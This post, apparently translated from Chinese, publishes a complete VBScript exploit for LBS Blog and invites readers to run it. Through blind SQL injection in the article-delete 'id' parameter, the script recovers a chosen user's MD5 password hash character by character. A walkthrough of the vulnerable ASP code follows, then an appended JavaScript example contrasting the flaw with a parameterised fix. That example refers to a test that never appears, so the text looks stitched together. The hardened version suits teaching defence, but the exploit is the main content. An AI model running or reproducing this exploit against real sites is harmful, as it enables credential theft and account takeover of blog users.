Oh, and just to prove the hole is real: the exploit follows. Save it as a .vbs file and test it yourself. The program:
' By Jian Xin
'============================================================================
' Usage:
' At a command prompt:
'   Cscript.exe lbsblog.vbs <blog path of the target site> <a valid article ID> <user ID of the blog account to crack>
' For example:
'   Cscript.exe lbsblog.vbs www.xxxx.com/blog/ 1 1
' By loveshell
'============================================================================
On Error Resume Next
Dim oArgs
Dim oLbsXml            ' XMLHTTP object used to open the target URL
Dim TargetUrl          ' target URL
Dim UserID, ArticleID  ' blog user ID to crack, and a valid article ID to inject through
Dim TempStr            ' holds the part of the MD5 password recovered so far
Dim CharHex            ' the 16 hex characters an MD5 digest is made of
CharHex = Array("0", "1", "2", "3", "4", "5", "6", "7", "8", "9", "a", "b", "c", "d", "e", "f")
Set oArgs = WScript.Arguments
If oArgs.Count < 3 Then Call ShowUsage()
Set oLbsXml = CreateObject("Microsoft.XMLHTTP")
' Build the full target URL
TargetUrl = oArgs(0)
ArticleID = oArgs(1)
UserID = oArgs(2)
If LCase(Left(TargetUrl, 7)) <> "http://" Then TargetUrl = "http://" & TargetUrl
If Right(TargetUrl, 1) <> "/" Then TargetUrl = TargetUrl & "/"
TargetUrl = TargetUrl & "article.asp"
WScript.Echo "LBS Blog All version exploit" & vbCrLf
WScript.Echo "By Jian Xin" & vbCrLf
WScript.Echo "http://www.loveshell.net/ Just for fun :)" & vbCrLf & vbCrLf
WScript.Echo "+fuck The site Now" & vbCrLf
Call Main(TargetUrl, ArticleID, UserID)
Set oLbsXml = Nothing
'----------------------------------------------Sub-------------------------------------------------------
'============================================
' Name: Main
' Purpose: main routine, injects to obtain the blog user's password hash
'============================================
Sub Main(TargetUrl, ArticleID, UserID)
    Dim MainOffset, SubOffset, OpenUrl, GetPage, PostData
    ' An MD5 hex digest is 32 characters: guess one hex character per position
    For MainOffset = 1 To 32
        For SubOffset = 0 To 15
            ' Injected into the id parameter of the delete action:
            ' <article id> and (select left(user_password,N) from blog_user where user_id=<user id>)='<known prefix + guess>'
            PostData = ArticleID & " and (select left(user_password," & MainOffset & ") from blog_user where user_id=" & UserID & ")='" & TempStr & CharHex(SubOffset) & "'"
            OpenUrl = TargetUrl
            oLbsXml.Open "POST", OpenUrl, False, "", ""
            oLbsXml.SetRequestHeader "Content-Type", "application/x-www-form-urlencoded"
            oLbsXml.Send "act=delete&id=" & Escape(PostData)
            GetPage = BytesToBstr(oLbsXml.ResponseBody)
            ' Decide from the response whether the guessed prefix was right
            If InStr(GetPage, "deleted") <> 0 Then
                ' "The article does not exist or has been deleted" is the error flag for a wrong guess:
                ' the injected condition was false, so no article row was loaded.
                ' If the result comes back as 0000000000000000, change the error flag to match the target's wording.
            ElseIf InStr(GetPage, "permission") <> 0 Then
                ' The condition held: the row loaded and the later "no permission" check fired, so keep this character
                TempStr = TempStr & CharHex(SubOffset)
                WScript.Echo "+crack now: " & TempStr
                Exit For
            Else
                WScript.Echo vbCrLf & "Something Error" & vbCrLf
                WScript.Echo vbCrLf & GetPage & vbCrLf
                WScript.Quit
            End If
        Next
    Next
    WScript.Echo vbCrLf & "+we got it: " & TempStr & vbCrLf & vbCrLf & ":P Don't be evil"
End Sub
'============================================
' Name: BytesToBstr
' Purpose: converts the XMLHTTP response body into a GB2312-decoded string
'============================================
Function BytesToBstr(Body)
    Dim objStream
    Set objStream = CreateObject("ADODB.Stream")
    objStream.Type = 1      ' adTypeBinary
    objStream.Mode = 3      ' adModeReadWrite
    objStream.Open
    objStream.Write Body
    objStream.Position = 0
    objStream.Type = 2      ' adTypeText
    objStream.Charset = "GB2312"
    BytesToBstr = objStream.ReadText
    objStream.Close
    Set objStream = Nothing
End Function
'============================
' Name: ShowUsage
' Purpose: prints usage hints
'============================
Sub ShowUsage()
    WScript.Echo "LBS Blog Exploit" & vbCrLf & "by loveshell / Jian Xin"
    WScript.Echo "Usage:" & vbCrLf & "CScript " & WScript.ScriptFullName & " TargetUrl ArticleID UserID"
    WScript.Echo "Example:" & vbCrLf & "CScript " & WScript.ScriptFullName & " http://www.loveshell.net/ 1 1"
    WScript.Echo ""
    WScript.Quit
End Sub
Vulnerability description:
In src_article.asp:
......
input["log_id"] = func.checkint(input["log_id"]);
if (!input["id"]) {
    strError = lang["Invalid_parameter"];
} else {
    // check whether the article exists
    theArticle.load("log_id, log_authorid, log_catid", "log_id=" + input["id"]);
    strError = false;
}
......
The integer filter is applied to log_id, but the value actually used in the query is the raw id, hehe :)
And then what?
The code in class/article.asp:
this.load = function (strSelect, strWhere) {
    var tmpA = connBlog.query("select top 1 " + strSelect + " from [blog_article] where " + strWhere);
    if (tmpA) {
        this.fill(tmpA[0]);
        return true;
    } else {
        return false;
    }
}
No need to spell that out, hehe. But what about the condition for reaching it: let's see whether it can be met.
function articleDelete() {
    if (theUser.rights["Delete"] < 1) {
        // check the user's right, without a DB query
        pageHeader(lang["error"]);
        redirectMessage(lang["error"], lang["No_rights"], lang["GoBack"], "javascript:window.history.back();", false, "errorbox");
    } else {
        var theArticle = new lbsArticle();
        var strError;
        // By default Guest has the Delete right, so this branch is reached and the load() above runs.
        // There is a further check after it, but the injection has already happened by then;
        // the error message of that later check is simply what we key on for the injection, hehe.
        // ... (the rest of the function is cut off on the original page)
    }
}
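The parameter-handling bug in src_article.asp beside a hardened version, as an added example (not LBS Blog code). The page does not show what `func.checkint` does internally, so `checkint` below is an assumed stand-in modelled as "coerce to a non-negative integer, 0 on anything else"; the injected request is constructed from the payload the exploit sends.

```javascript
// Added example (not LBS Blog code): the parameter-handling bug from
// src_article.asp beside a hardened version. `checkint` is an assumed stand-in
// for func.checkint; its real behaviour is not shown on the page.
function checkint(value) {
  const s = String(value === undefined || value === null ? "" : value).trim();
  return /^\d+$/.test(s) ? Number(s) : 0;
}

// Vulnerable shape: the filter runs on input["log_id"], but the WHERE clause
// is built from the raw input["id"], so attacker text reaches the query.
function buildWhereVulnerable(input) {
  input["log_id"] = checkint(input["log_id"]);
  if (!input["id"]) return { error: "Invalid_parameter" };
  return { where: "log_id=" + input["id"] };
}

// Hardened shape: validate the key that is actually used, reject rather than
// silently coerce, and hand the value over as a parameter instead of pasting
// it into the SQL text (with ADO that is an ADODB.Command parameter).
function buildWhereHardened(input) {
  const raw = input["id"];
  const s = String(raw === undefined || raw === null ? "" : raw).trim();
  if (!/^[1-9]\d*$/.test(s)) return { error: "Invalid_parameter" };
  return { where: "log_id=?", params: [Number(s)] };
}

// Constructed request body values, already URL-decoded, as the exploit sends them.
const INJECTED_REQUEST = {
  log_id: "1 and 1=1",
  id: "1 and (select left(user_password,1) from blog_user where user_id=1)='5'",
};

// Side by side: the vulnerable builder lets the injection through, the
// hardened one rejects it.
function compare(input) {
  return {
    vulnerable: buildWhereVulnerable({ ...input }),
    hardened: buildWhereHardened({ ...input }),
  };
}
```

`checkint` really does run here, but on a key the query never reads; the test below shows `log_id` coming out as 0 while the unfiltered `id` lands in the WHERE clause verbatim.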